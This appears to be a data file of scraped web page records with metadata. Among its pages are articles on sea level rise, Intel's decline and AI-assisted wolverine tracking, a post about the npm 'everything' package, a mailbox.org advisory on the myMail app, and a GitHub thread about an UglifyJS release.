client.get_recommend('10') ``` ``` $client->getRecommend('10'); ``` ``` client.GetRecommend("10"); ``` ``` [ "mbostock:d3", "nt1m:material-framework", "mdbootstrap:vue-bootstrap-with-material-design", "justice47:f2-vue", "10clouds:cyclejs-cookie", "academicpages:academicpages.github.io", "accenture:alexia", "addyosmani:tmi", "1wheel:d3-starterkit", "acdlite:redux-promise" ] ``` The exact output might be different from the example since the playground dataset changes over time.
true
true
true
Gorse is an open-source recommendation system written in Go. Gorse aims to be a universal open-source recommender system that can be easily introduced into a wide variety of online services. By importing items, users and interaction data into Gorse, the system will automatically train models to generate recommendations for each user.
2024-10-12 00:00:00
2023-04-05 00:00:00
https://gorse.io/
website
gorse.io
Gorse
null
null
201,635
http://technology.timesonline.co.uk/tol/news/tech_and_web/article4015809.ece
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
30,358,575
https://theconversation.com/what-drives-sea-level-rise-us-report-warns-of-1-foot-rise-within-three-decades-and-more-frequent-flooding-177211
What drives sea level rise? US report warns of 1-foot rise within three decades and more frequent flooding
Jianjun Yin
Sea levels are rising, and that will bring profound flood risks to large parts of the Gulf and Atlantic coasts over the next three decades. A new report led by scientists at the National Oceanic and Atmospheric Administration warns that the U.S. should prepare for 10-12 inches of relative sea level rise on average in the next 30 years. The rise is due to both sinking land and global warming. And given the greenhouse emissions released so far, the country is unlikely to be able to avoid it. That much sea level rise means cities like Miami that see nuisance flooding during high tides today will experience more damaging floods by midcentury. Nationally, the report expects moderate coastal flooding will occur 10 times as often by 2050. Without significant adaptations, high tides will more frequently pour into streets and disrupt coastal infrastructure, including ports that are essential for supply chains and the economy. The higher ocean will also bring seawater farther inland. By the end of the century, an average of 2 feet of sea level rise or more is likely, depending on how much the world its cuts greenhouse gas emissions. As a geoscientist, I study sea level rise and the effects of climate change. Here’s a quick explanation of two main ways global warming is affecting ocean levels and their threat to the coasts. ## Ocean thermal expansion As greenhouse gases from fossil fuel use and other human activities accumulate in the atmosphere, they trap energy that would otherwise escape into space. That energy causes average global surface temperatures to rise, especially the upper layers of the ocean. Thermal expansion happens when the ocean heats up. The heat causes sea water molecules to move slightly farther apart, taking up more space. The result is the ocean rises higher, flooding more land. Over the past several decades, about 40% of global sea level rise has been due to the effect of thermal expansion. The ocean, which covers about two-thirds of the Earth’s surface, has been absorbing and storing more than 90% of the excess heat added to the climate system due to greenhouse gas emissions. ## Melting land ice The other major factor in rising sea levels is melting land ice. Mountain glaciers and polar ice sheets are diminishing at rates faster than natural systems can replace them. When land ice melts, that meltwater eventually flows into the ocean, adding new quantities of water to the ocean and increasing the total ocean mass. About 50% of global sea level rise was induced by land ice melt during the past several decades. Currently, the polar ice sheets in Greenland and Antarctica hold enough frozen waters that if they melted completely, it would raise the global sea level by up to 200 feet, or 60-70 meters – about the height of the Statue of Liberty. Climate change is melting sea ice as well. However, because this ice already floats at the ocean’s surface and displaces a certain amount of liquid water below, this melting does not contribute to sea level rise. ## Risk will keep rising long after emissions stabilize While the surface height of the ocean rises globally as the planet warms, the impact is not the same for every coastal region. The rate of rise can be several times faster in some places due to unique local conditions, such as shifts in ocean circulation or the subsidence of the land. The U.S. East Coast and Gulf Coast, for example, face risks above the average, according to the new report, while the West Coast and Hawaii are projected to be lower than average. Nearly 4 in 10 U.S. residents live near a coastline, and a large part of the U.S. economy is there, as well. Even when greenhouse gas emissions eventually fall, sea level will keep rising for centuries because the massive ice sheets in Greenland and Antarctica will continue to melt and take a very long time to reach a new equilibrium. A 2021 report from the Intergovernmental Panel on Climate Change shows the excess heat already in the climate system has locked in the current rates of thermal expansion and land ice melt for at least the next few decades. [*Get more science, health and technology news.* Sign up for The Conversation’s weekly science newsletter.]
true
true
true
A sea level scientist explains the two main ways climate change is threatening the coasts.
2024-10-12 00:00:00
2022-02-16 00:00:00
https://images.theconver…6&h=668&fit=crop
article
theconversation.com
The Conversation
null
null
31,143,681
https://blackwingpages.com/2022/03/17/eberhard-faber-pencil-names-and-numbers/
null
null
null
true
false
false
null
null
null
null
null
null
null
null
null
608,305
http://www.codinghorror.com/blog/archives/001266.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,197,658
https://www.axios.com/2024/01/30/ransomware-pay-out-decline-chart
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,723,988
https://uncenter.dev/posts/npm-install-everything/
The package that broke npm (accidentally) - uncenter.dev
null
# The package that broke npm (accidentally) ## An update! ## You might want to read the rest of the article first... GitHub has now, a day after writing this, fully "disabled" (whatever that means) our `everything-registry` organization on NPM and GitHub; you can see the email they sent to me below. While I may not agree entirely with the reasoning they provided, I am very thankful that our personal accounts are still intact! ## Email from GitHub Trust & Safety All of our scoped packages have been deleted, so unpublishing packages should no longer be an issue. Another note; this story was picked up by some media outlets in the cybersecurity world! SC Media, Checkmarx, and BleepingComputer. ## The aforementioned articles Ten years ago, PatrickJS created the `everything` package on NPM, containing every package on the NPM registry in the first 5 years of the registry's existence. The package remained the same for years, but that all changed just a few days ago with a single tweet. I saw the tweet on my timeline and made a quick PR to clean up a few things and help bring the repository up to speed. At the same time, Patrick had started an attempt to publish a `2.0.0` version of the package, but he discovered that there was now a `10` megabyte limit for the uncompressed size of a package. I made a comment about the issue and we quickly began brainstorming a solution. ## Brainstorming... We moved to Twitter DMs, and by this time others who saw Trash's tweet wanted to join — Hacksore, and Trash himself. We came up with a plan to divide the ~2.5m packages into "scoped" groups of packages; a group for packages starting with the letter "a", the letter "b", and the rest of the alphabet, and then the numbers "0" to "9", and finally an "other" category for anything else. Since each of these scoped packages would only be a subset of the total, they would easily pass the size limit, and the main `everything` package could just depend on each of these scoped packages. ## Unforeseen issues I began implementing some code to generate the required packages, and a few hours later we were ready to go- except we forget one thing. Or, rather, NPM didn't tell us one thing. It turns out that NPM has a limit for how many dependencies a package can have. And we were apparently *way* over it. NPM has no apparent documentation on this and the limit wasn't visible in any public source code (the registry is private), so Hacksore did some testing and discovered the limit to be 800 dependencies. At the current range of 90k to 300k dependencies per scoped package... we needed a new plan. ## Back to the drawing board I suggested a new, very basic plan: just split them into "chunks" (groups) of 800 dependencies. This leaves 3246 groups though, and 3246 is still too many for our main `everything` package to hold. So we simply "chunk" the 3246 groups of 800 into groups of 800 again. ## 3...2...1... go! Set on our new plan, we updated the code and triggered our GitHub Actions workflow... It worked! The GitHub Action logs rolled in, one after another, as the packages slowly got published. We had a brief scare after realizing that GitHub Actions jobs and workflows have a maximum time that we might reach, but some quick calculations revealed that we had no cause for worry. Workflow jobs time out after 6 hours, and at the current rate of one package published every ~4.5 seconds, we could comfortably publish 4,800+ packages in that time. We all went back to doing other things, and I checked the logs occasionally. Half an hour later though, we ran into a different problem... we had been rate limited. In 32 minutes, we had published 454 packages: the main `everything` package, all five "chunks", but only 448 "sub-chunks". It was only a fraction (roughly 14%) of everything (hah, pun intended) we needed to publish. ## What next?? I made a quick fix before heading to bed to skip the packages we had already published, but we still didn't have any sort of plan to deal with rate limiting. Overnight between the 29th and the 30th, we settled on a new plan. We would periodically run a workflow that publishes as many packages as it can, and then the workflow saves the work it did to the repository so the next run can pick up where the last one left off. I replaced the sketchy manual intervention from the night before with a proper `published.json` file to keep track of the published packages, and initialized it. I wrote a release script that wrote back to `published.json` after publishing each package (I know, I know, this could be better) and added a step to the workflow to commit the changes after each run. After a few hiccups, it finally worked! So it began. Throughout the day I (very irregularly) manually dispatched the workflow. For a while, we sat and waited. We even began an effort to actually run `npm install everything` (well, `yarn add everything` ) and put up a Twitch stream of the installation on a virtual machine. We also made a website! Many thanks to the rest of the contributors I have mentioned so far, but notably Evan Boehs for leading the charge and PickleNik made it look nice. ## Finale Finally, at 11:27PM, the final workflow run completed publishing the last 20 sub-chunks. All 5 chunks, 3246 sub-chunks, and the main `everything` package. In total, depending on over 2.5 million NPM packages! ## A vulnerability? The initial response to our endeavour was... not positive. People began coming to the repository, complaining about not being able to unpublish. What?! We looked into it, and it turns out that the issue was our usage of "star" versions; that is, specifying the version not as a typical semantic version in the format of `X.Y.Z` , but as `*` . The star means "any and all" versions of a package - here is where the issue lies. NPM blocks package authors from unpublishing packages if another package depends on that version of the package. But since the star is *all* versions, all versions of a package cannot be unpublished. This is usually harmless, but us (unintentionally) doing this on a large scale prevented *anyone* from unpublishing. We immediately reached out to GitHub; Patrick used his network and contacts to speak to people at GitHub, and we sent multiple emails to the support and security teams on NPM. Unfortunately, these events transpired over the holidays and the NPM/GitHub teams were not responding (likely out of the office). We continued to get harsh and rude comments from random people with a little too much time on their hands... one person even wrote a 1400 word rant about the unpublishing issue, despite us repeatedly telling them we could do nothing further. Thankfully, on the night of January 2nd, GitHub reached out and let us know they were aware of the problem. On the 3rd of January, we received a notice that our GitHub organization had been "flagged" and our organization and repositories were hidden. Not what we wanted to see, but progress nonetheless. They also began removing our organization's scoped packages on NPM, as we had suggested. The initial problem had been solved, but we are still waiting to see how NPM prevents this issue in the future. My two cents are that NPM should either a) prevent folks from publishing packages with star versions in the package.json entirely, or b) don't consider a dependent of a package if it uses a star version when tallying how many packages depend on a package for unpublishing. Lastly, I want to apologize for anyone frustrated, annoyed, or just angry at us. We made a mistake, and we've owned up to it. This all started as a harmless joke and we had no intentions of breaking, abusing, or doing any sort of damage to the registry. In short we, uhh... fucked around and found out. Thanks for reading this, and have a lovely day! *Now* you can read the update if you haven't already!
true
true
true
How we made a package that depends on every single npm package... and completely broke npm in the process.
2024-10-12 00:00:00
2024-01-03 00:00:00
https://uncenter.dev/102…g?v=2316a73de1f9
article
uncenter.dev
uncenter.dev
null
null
35,845,308
https://mailbox.org/en/post/mailbox-org-discovers-unencrypted-password-transmission-in-mymail
mailbox.org discovers unencrypted password transmission in myMail | mailbox.org
null
# mailbox.org discovers unencrypted password transmission in myMail At mailbox.org, security and privacy are of the utmost importance to us, particularly in the area of email communication. Therefore, we would like to inform you about a critical security vulnerability in the myMail client for iOS that we have recently discovered. This vulnerability results in unencrypted transmission of user passwords and emails. Our team became aware of the issue after our customers reported transmission errors when sending emails via the myMail client in the user forum. Upon a thorough examination of the logs, we found that the myMail app attempts to transmit passwords without the required TLS encryption, thus leaving them unprotected and posing a significant security risk. Instead of sending the usual "STARTTLS" command after establishing a connection, the app continued to transmit the user's login details unencrypted. As a result, we were able to extract users' passwords from the connection logs. At mailbox.org, we consistently reject unencrypted connections on our servers to ensure your security at all times. It was only for this reason that the myMail app's connection attempts failed, bringing the issue to our attention. This problem not only affects our customers but also poses a general security risk for all users who use the myMail client. Contents and passwords can be intercepted and read by third parties, especially when users are in an open network. If other providers allow unencrypted connections and are used in conjunction with the current version of the myMail app, attackers can also read the content of unencrypted emails. We strongly recommend that you stop using the myMail client with our service or other email providers until the app developers have resolved these security issues. There are numerous alternative email clients that offer higher security standards and better protect your privacy. At the same time, the current incident underscores the importance of communicating exclusively through securely configured systems that enforce encryption.
true
true
true
The mailbox.org team has discovered a critical vulnerability in the myMail client for iOS.
2024-10-12 00:00:00
2023-04-26 00:00:00
https://mailbox.org/file…log-exchange.jpg
null
null
mailbox.org discovers unencrypted password transmission in myMail
null
null
14,541,021
https://github.com/mishoo/UglifyJS2/issues/2054
npm install of 2.8.28 is downloading files with timestamp of Dec 31, 1969 · Issue #2054 · mishoo/UglifyJS
Mishoo
- Notifications You must be signed in to change notification settings - Fork 1.2k ## New issue **Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community. By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails. Already on GitHub? Sign in to your account # npm install of 2.8.28 is downloading files with timestamp of Dec 31, 1969 #2054 ## Comments I'm afraid not much can be done over here - may be try asking | One thing I can add is | Pretty sure the issue is on your side. 2.8.27 is fine as well. It's only 2.8.28 that is "corrupted." | Unless the package is unusable, I wouldn't be too bothered by it. And there is no way I can influence the behaviour of | The package is not usable. I cannot zip up the build folder because zip cannot handle files with a creation date before 1980. I had to switch to 2.8.27. Can you not just republish 2.8.28 to fix these timestamps? | | So that I can create a package for deploying the application along with npm dependencies to a test environment. Edit: can you try pushing a new version, 2.8.29? | And even if I were to publish As advised above, please contact | I can almost guarantee that if I open a ticket with npm and/or nodejs about a specific npm module on a specific version having corrupted timestamps they're going to point the finger back at this module. | I just downloaded your tgz file DIRECTLY from npm, and it's corrupted IN the tgz file: | Regardless of who is to blame here, you have to resolve this somehow. You have a corrupted tarball on the latest 2.x version available. It's not my responsibility to figure out why your publish corrupted the timestamps on these files. | Why is this issue closed? The package you published to npm has corrupt file metadata. There are developers here at The Atlantic who have lost a whole afternoon of work trying to debug an issue caused by 2.8.28. | @alexlamsl | What issue? 2.8.28 still functions correctly regardless of the bad timestamps produced by | It caused errors with the filesystem in our dockerized development environment. Of course it still functions as it's supposed to, provided the package can actually be installed. | The next 2.x release can be made with a non- | Same issue here. Our private deployment system reject the tarball. If I extract the tarball and | @alexlamsl please stop trying to defer blame here. The issue is with this specific npm package for a specific version. Push a new version so people can move on. | Should I post a | This is blocking my deployments also... Any workaround? | @mishagray use 2.8.27 until the module author decides that this isn't a problem with node / npm. | This seems related to npm/npm#10052, which (if resolved) would alleviate your issue. | It's true that npm/npm#10052 would incidentally fix this issue, because it would reset modification times on files, but there is a much simpler fix that would not require waiting for an 18-month-old issue on npm to be fixed. it is not a bug in npm.This is a bug in the package you pushed to the npm registry, @alexlamsl, plain and simple. Your refusal to acknowledge this or to take even the simplest steps to address it reflects very poorly on you and on this project. | @fdintino This is not a bug in UglifyJS. | Who cares what the cause of the issue is? Fix it first then point fingers after. This attitude of "not my problem" when your package is broken solves nothing. | I'm baffled by your attitude, frankly. An immeasurable amount of time has been put into this project by people in their own spare time, and you expect them to fix UglifyJS is not broken. (And to be honest, it is exactly this attitude that drives me away from doing OSS at all) | Fix MY Environment? Wtf are you talking about? It's been demonstrated that the tarball on npm has corrupted timestamp data. How is that MY environment? | Then the bafflement is mutual. You have four different people telling you that the file metadata in the 2.8.28 package is causing issues with their environments and deployments. And you have a (likely) easy solution—push a bumped version from a directory other than the corrupted one that published 2.8.28. But you ignore the former and don't seem to care about the latter. It goes without saying that everyone here appreciates the hard work that is poured into this project, otherwise we wouldn't be using it! I maintain several popular open source projects as well, and I appreciate the challenges that come with it. But if a package I published caused issues in multiple peoples environments, and it was in my power to fix it, I would do so! I think it's safe to assume that the odd modification time of the files in uglify-js is not intentional—it has no functional benefit and it's also plainly incorrect, these files were not modified in 1969. You have multiple people telling you that this causes incompatibilities in various different systems. I can only speak for myself, but here's a demonstration of how the files are incompatible in our system. To reproduce, you just need to install unison, a tool for performing two-way directory syncing: Outputs the following: Is it a bug that unison cannot sync files with a ctime and mtime of 0? Yes, perhaps, and I can open a ticket on that project. But judging by the others who have posted on this issue, the file metadata in the npm tgz are causing problems in other systems. And there is an easy way to ensure compatibility with everyone's system—a clean build and publish of a new version. I apologize for my tone earlier in this thread—I'm just frustrated by the refusal to even | @eric-tucker: "I cannot zip up the build folder because zip cannot handle files with a creation date before 1980." Even with the incorrect timestamps, The problem with your zip program is out of scope of uglify. It's trivial to write a command to touch the files for your broken | I will offer my apology regarding assuming this wasn't an npm issue and for any hostility shown previously. However, I stand by my affirmation that this should have been handled more professionally (by everyone), including keeping the issue open while people tracked down the root cause. Edit: side note - I wouldn't have been able to create any kind of helpful issue on npm as I have no idea what the author's build environment and/or npm/node versions were/are at the time of publish. The author should have created the ticket with npm saying "this is my environment and this is what happened." | My two cents here: It's important for maintainers of open-source projects to accept bugs as valid, This is also why issues should only be closed if there's clear evidence that they're invalid, not just "looks like not our problem". If there's doubt about whether it's user error or a bug in the maintainer's stack, then it's the job of the maintainer to ask the right questions to assess that (and prepare issue templates, and so on). The user can't know what information you need, until you ask. Put more succinctly: That having been said, there's a big difference between informing a maintainer that it's their job to handle bug reports, and personally accusing them of being responsible for your woes. Especially when you're a developer (read: a professional), you're expected to have the infrastructure in place to deal with upstream issues when they inevitably occur. While it is the maintainer's responsibility to pick up the bug and trace where it originates from, In the end, nothing is accomplished by pointing blame back and forth. Let's just each take our part of the responsibility - maintainers are responsible for tracking down bugs and getting them fixed regardless of where in the stack they occur, and developers ("users") are responsible for having their own contingency plans when things do eventually break, despite best efforts of all parties. | @joepie91 all excellent points. I would add though that, while I can only speak for myself, my expectation isn't that the uglifyjs maintainers should fix this | Very good points @joepie91 . I would agree with @fdintino that waiting until the next backport release to address this problem is definitely downplaying the severity of this issue. It's almost always brought in as a transitive dependency so for someone starting a new project who hasn't yet encountered this issue they are most certainly going to encounter this bug. This will continue to consume a lot of development hours across many companies until 2.8.29+ is released. I agree with using open source is always "at your risk" but this is an incredibly important issue that Closed means non-issue, can't reproduce, or some other status of "not something we can or will address." This issue falls under none of those categories. | Just to recap and to get a more clear vision of how we can proceed. The issue will not be fixed, although the problem is identified. At least until the next backport release? Is there any vague time frame when this happens? I am asking because we have no easy way to fix the current corrupted package by ourself in our current build chain. Any of the current workarounds flying around here are not really applicable in the way our build process works currently. So the only way to get our system running again is removing dependencies that pulled in UglifyJS2 and try to write the functionality ourself? I would be glad to get a statement about this so we can make an informed decision and work out a solution plan and start taking action to get our system back to life. | @pythoneer if you | When there's a complaint about a specific package version like this, please consider either using one of the many npm API tools to directly download the package and verify it, or using I understand that the root cause of this issue wasn't in uglify-js. But the tools you use when you build packages is still your responsibility. If you're using a tool (or a version of that tool) that produces incorrect output, the expectation is that you recall the release and/or you downgrade your tools until that issue is fixed - not that you leave everyone in limbo until upstream figures out what Many developers (myself included) like to use the latest versions of their tools and software, and that's understandable. But sometimes this can introduce bugs. I'd like to suggest that you set up a free account with https://travis-ci.org/. You can do automated builds on there and set it up to publish directly from there, so the setup on your local machine won't matter at that point. If your personal setup is going to change frequently, it makes sense to use a more static configuration that's not as fragile. Good luck in dealing with the remaining pieces of the issue. | Is it a matter of pride that the issue is still closed? I've already implemented fixes in our build processes and told the company wide to lock any new package.json entries to version 2.8.27. That doesn't mean that a new point release shouldn't be published immediately. Yes, it is a small inconvenience in terms of individual persons or projects, but you should consider the collective time spent across all people dealing with this issue, including the numerous other projects having reported issues that lead back to this issue (that leads back to the @alexlamsl please, at least reopen this issue, and mark it fixed when you have time to update node/npm and republish. This is going to continue to break builds until a fix is implemented. Put at least a little consideration into the time of all the people who will ultimately see this issue pop up. | @eric-tucker I'm glad that you were able to fix your build process, but I don't think it's a productive use of your time to continue repeating your opinions here. I'm pretty certain you've made your beliefs crystal clear. I think that everyone on both sides of this have had ample opportunity to express their opinions, and many valid points were made from both sides. At this point, the only logical thing to do is to sit back and see what the maintainers do. I do not believe that continuing to berate them will offer much incentive for them to grant your wishes. | If people had put as much effort into being helpful as into writing meme comments, this would have been fixed a week ago. I never actually had this problem, but the response of the maintainers and community is making me think that I am unsafe to depend on this tool. | mishoo/UglifyJS#2054 shrinkwrap was an issue because of cp-translations bumping on deploy npm 3 is dodgy on node 0.10 and would have forced an upgrade on all microservices so here is a dodgy workaround mishoo/UglifyJS#2054 shrinkwrap was an issue because of cp-translations bumping on deploy npm 3 is dodgy on node 0.10 and would have forced an upgrade on all microservices so here is a dodgy workaround Time to move to Clojure Compiler, this debacle is embarrassing. | @schwitzerm A fixed release was pushed out to npm, 2.8.29. I really appreciate it @alexlamsl. I don't benefit from it personally, but I'm glad this won't cause issues going forward for fellow developers. You have gotten a lot of grief (some, admittedly, from me). And you aren't likely to be thanked by any of the people who would have been frustrated by the node bug that crept into the 2.8.28 build but now will not, because people only notice when things break. The same goes for all of the other bug fixes you continue to push out for the 2.x backport branch and the features being added to 3.x. I would imagine, particularly after this episode, that this can sometimes be a thankless job. So I'd like to personally express my gratitude for your work. | @alexlamsl this is honestly the most brutal silent treatment from a maintainer of a popular repo I've seen till now. | With the amount of pisspoor attitude from most people in this thread, can you blame them? Also, this was never a problem caused by this project, it was always third party tools that couldn't handle timestamps properly, and the only reason it was found out was because of a bug in yet another tool. None of this was caused because of UglifyJS. However, they already So why are you still harping on on this obsolete and outdated issue that doesn't mean anything to anyone anymore? | et304383commentedThis does not happen with 3.x: The text was updated successfully, but these errors were encountered:
true
true
true
[etucker: npm_test]$ ll total 0 [etucker: npm_test]$ npm install [email protected] npm WARN saveError ENOENT: no such file or directory, open '/home/etucker/play/npm_test/package.json' npm notice cr...
2024-10-12 00:00:00
2017-06-05 00:00:00
https://opengraph.githubassets.com/22b527f57acad6c65c66efe6419cceb33dab8c7b2fe27f25c87eba48566a4eea/mishoo/UglifyJS/issues/2054
object
github.com
GitHub
null
null
17,199,672
https://wamp-proto.org
The Web Application Messaging Protocol¶
null
# The Web Application Messaging Protocol¶ Welcome to the Web Application Messaging Protocol (WAMP)! WAMP is an open application level protocol that provides two messaging patterns: Routed **Remote Procedure Calls**and**Publish & Subscribe** uses different serializers for message encoding, like: and many others and can run over different transports, like: Raw TCP Socket Unix domain socket The WAMP protocol is a community effort and the specification is made available for free under an open license for everyone to use or implement. The original design and proposal was created by Crossbar.io developers in 2012 and WAMP development is sponsored since then by Crossbar.io (the company). **Get in touch** with us on our mailing list, github or search for answers on StackOverflow: The WAMP protocol is also looking for contributors that help polishing up the spec, filling in gaps. A good starting point are our open issues on our issue tracker.
true
true
true
null
2024-10-12 00:00:00
2024-01-01 00:00:00
null
null
wamp-proto.org
wamp-proto.org
null
null
21,050,811
https://www.seattletimes.com/business/technology/machine-learning-methods-harness-ai-to-help-wolverine-recovery/
Conservationists harness AI to help wolverine recovery in Washington
Melissa Hellmann
The elusive species of wolverines have a long history in their native Washington — they survived the Ice Age but were nearly driven to extinction by over-hunting and trapping in the early 1900s. Recently, wolverines have made a comeback in the North Cascades: Conservationists estimate between three to four dozen of the bushy-tailed mammals currently populate the mountain range. Surprisingly, artificial intelligence (AI) technology could play a role in helping scientists further protect these deep snow dwellers vulnerable to climate change and habitat loss. Washington conservationists are focused on the recovery of the small carnivores. Using remote cameras that detect motion and a machine learning system, a method that finds patterns in a large amount of data, some researchers say they have the answer to tracking the shy creatures during a critical time for their survival. At the forefront of wolverine recovery in the state, Dr. Robert Long — senior conservation scientist of Seattle’s Woodland Park Zoo — has placed remote cameras throughout Washington, Idaho, and Montana to track the animals for nearly a decade. The cameras allow conservationists to collect thousands of images that track the movements of wolverines and determine whether shifts in climate harm the populations. Such information could be used to create corridors for the wolverines, said Long, like the Interstate 90 animal overpass that enables safe passage over highways that cut through the North and South Cascades. “These top predators, or carnivores, can have major effects on the ecosystem. If they’re gone, then their prey can increase in number,” said Long. “We don’t have a sense of the exact role these creatures play, so it would behoove us to ensure their populations persist,” he added. However, finding pictures of wolverines — among tens of thousands of images depicting various wildlife, people and swaying tree limbs that falsely triggered the motion sensors — proved to be time consuming for researchers. A lack of staff and volunteers to classify the photos led to an information lag, with biologists sometimes waiting months or years to use the data found in the images. Manoj Sarathy, a young gamer and a volunteer at the Seattle-based nonprofit Conservation Northwest, set out to eliminate the problem using his knowledge of AI. Sarathy developed a machine-learning system that could classify images from remote cameras by annotating thousands of images from several conservation organizations and feeding them back into a computer program. As he continued to improve the model’s training to recognize various objects, Sarathy sought to differentiate photos of animals from blank images, but he found that his gaming computer lacked the processing speed to train the system. So in 2018, Sarathy partnered up with Long to apply for a Microsoft AI for Earth grant, which provides cloud and AI tools to individuals and teams solving sustainability issues. As one of the over 300 AI for Earth grantees since Microsoft launched the program in 2017, Sarathy used $5,000 worth of cloud-computing credit that allowed him to train the system to sort all images into folders that corresponded with animals, humans or blank images. Long believes the machine-learning system will help conservationists gather information about the species before it’s too late. Ahead of the United Nations Climate Action Summit, Sarathy — now a freshman in the University of Washington computer-science program — is continuing his project and hopes to inspire others to protect the environment. “With me being an example, people can get involved with conservation using any skill they have without any kind of formal training,” Sarathy said. The opinions expressed in reader comments are those of the author only and do not reflect the opinions of The Seattle Times.
true
true
true
Using remote cameras that detect motion and a machine learning system, a method that finds patterns in a large amount of data, some researchers say they have the answer to tracking the shy creatures during a critical time for their...
2024-10-12 00:00:00
2019-09-22 00:00:00
https://images.seattleti…34.jpg?d=780x501
article
seattletimes.com
The Seattle Times
null
null
30,262,326
https://www.smartcompany.com.au/technology/innovation-intel-worlds-largest-chipmaker/
How a lack of innovation saw Intel dethroned as the world’s largest chipmaker
Howard Yu
American chip-making giant Intel is a shadow of its former self. Despite the global semiconductor shortage, which has boosted rival chipmakers, Intel is making less money than a year ago with net income down 21% year over year to US$4.6 billion ($6.45 billion). Unfortunately, this is an ongoing trend. Intel was the world’s largest chipmaker until 2021, when it was dethroned by Samsung. Though Samsung’s main business is memory chips, which is a different segment of the market to Intel’s microprocessors, it is sign of Intel’s decline. We’ve been tracking global companies’ future-readiness at the International Institute for Management Development (IMD), and Intel now comes out 16th in the technology sector. There are two fundamental issues, according to Matt Bryson, an analyst at Wedbush Securities: “[Intel] fell behind AMD in chip design and Taiwan Semiconductor (TSMC) in manufacturing.” During the most recent earnings call with analysts, CEO Pat Gelsinger had to concede that the technology in Intel’s data-centre processors hadn’t been improved in five years. In his words, it was “an embarrassing thing to say”. How did this happen to a company that for many years was well ahead of its competition, and what are the chances of a turnaround? ## Intel’s in-house model Intel used to be the undisputed king of microprocessors. PCs were made by many companies, but these were effectively just brand names. The prowess of the machines depended on whether they had an “Intel inside”. Here is how you compete as a chipset manufacturer: you etch more transistors on a slice of silicon wafer. To achieve this, Intel outspent its rivals on R&D and attracted the best scientists. But most importantly, it kept full control of both product design and manufacturing. Intel’s engineers — from research to design to manufacturing — have always worked as a close in-house team. In contrast, fellow US rivals like Qualcomm, Nvidia and AMD, have either shed their manufacturing capacity or never had it in the first place. They outsource to suppliers such as TSMC and other third-party foundries for the same reason that most of the stuff sold in Walmart is made in China: it’s cheaper. **Share performances of leading chipmakers, 2019-22** The challenge with outsourcing manufacturing is that your suppliers are probably not in the same building as you. Meetings won’t happen at the watercoolers or in the staff cafeteria. It takes scheduling and coordination. There’s bureaucracy. It’s hard to be on the same page. The problems that this can cause can be all too evident — for a long while, TSMC and Nvidia would be blaming each other for manufacturing issues, for instance. For years, Intel’s one-team approach enabled it to pull further and further away from the competition, with processors that were the most powerful. Yet what happened next was the classic disruption. ## The great library of Taiwan When mobile took off, the chipset didn’t require as much computing power as those in a laptop or PC, since the priority was energy-saving to extend battery life on a single charge. As Intel was in the business of selling top-quality chips for high margins, it left its rivals to supply chipsets for this new market. As a result, Intel got locked into selling ever more expensive and power-guzzling CPUs for PCs. With Qualcomm and Apple increasing orders to TSMC to supply Androids and iPhones, the Taiwanese supplier had to master remote work many years before the rest of us. It built up a formidable intellectual property (IP) library online, containing not only its own IP but also that of other suppliers in the value chain. TSMC could now quickly tell its customers what was possible from a manufacturing perspective and encode such knowledge into design rules. Transparency was total. Its customers could take what was available from the menu and stretch their product design to the limit. TSMC’s library has gradually become the industry’s largest. The best part is that workflow coordination is done online in a “virtual foundry” system that involves performance simulation, computer modelling and instant feedback. With virtual workflow that improves month after month, year after year, TSMC has steadily neutralised Intel’s advantages. ## Risk and demand TSMC doesn’t have to shoulder the risks of launching a new product. It just needs to excel in manufacturing, because if a Qualcomm product fails, AMD’s may take off. TSMC can switch capacity from one client to another. Risk is mitigated when demand is pooled. For chip designers, outsourcing to TSMC has gradually meant they can afford to be fast-moving and bold in product design. If a new chip doesn’t sell, they can pull the plug without having to worry about the factory: that’s TSMC’s problem. That’s how Nvidia has evolved beyond deploying graphic processors only in the gaming sector; it’s now leading in designing chipsets for AI applications. And AMD, an underdog close to bankruptcy in 2014, now makes some of the most powerful processors. Intel, meanwhile, still needs to ensure that every product wins with enough volume to feed its network of factories, each costing billions of dollars. This has made the company more and more conservative. And having stuck to supplying chips to PCs, servers and data centres, it is struggling to innovate. Tellingly, the company’s gross margin — total revenue minus the cost of production — has been sliding for nearly a decade. The biggest danger for a technology company is that it’s not developing leading-edge products fast enough, backsliding into selling commodities. The big issue for Pat Gelsinger is, how can a company built on self-reliance transform its culture quickly? He is talking about building a foundry service to regain scale in manufacturing. But the question is, how can Intel become a collaborative organisation not in a decade, but in a year? Andy Grove, the legendary late chair of Intel got it right. He said: “Only the paranoid survive.” *This article is republished from* The Conversation *under a Creative Commons license. Read the original article.* ## COMMENTS SmartCompanyis committed to hosting lively discussions. Help us keep the conversation useful, interesting and welcoming. We aim to publish comments quickly in the interest of promoting robust conversation, but we’re a small team and we deploy filters to protect against legal risk. Occasionally your comment may be held up while it is being reviewed, but we’re working as fast as we can to keep the conversation rolling.The SmartCompanycomment section is members-only content. Please subscribe to leave a comment.The SmartCompanycomment section is members-only content. Please login to leave a comment.
true
true
true
American chip-making giant Intel is a shadow of its former self. How did this happen to a company that for many years was well ahead of its competition, and what are the chances of a turnaround?
2024-10-12 00:00:00
2022-02-08 00:00:00
https://www.smartcompany…pg?fit=733%2C353
article
smartcompany.com.au
SmartCompany
null
null
2,900,878
http://stackoverflow.com/questions/1049947/should-utf-16-be-considered-harmful
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
16,605,928
http://www.dailymail.co.uk/news/article-5511183/Prison-reformer-runs-nonprofit-accused-sexual-assault.html
Prison reformer who runs nonprofit is accused of sexual assault
Dailymail com
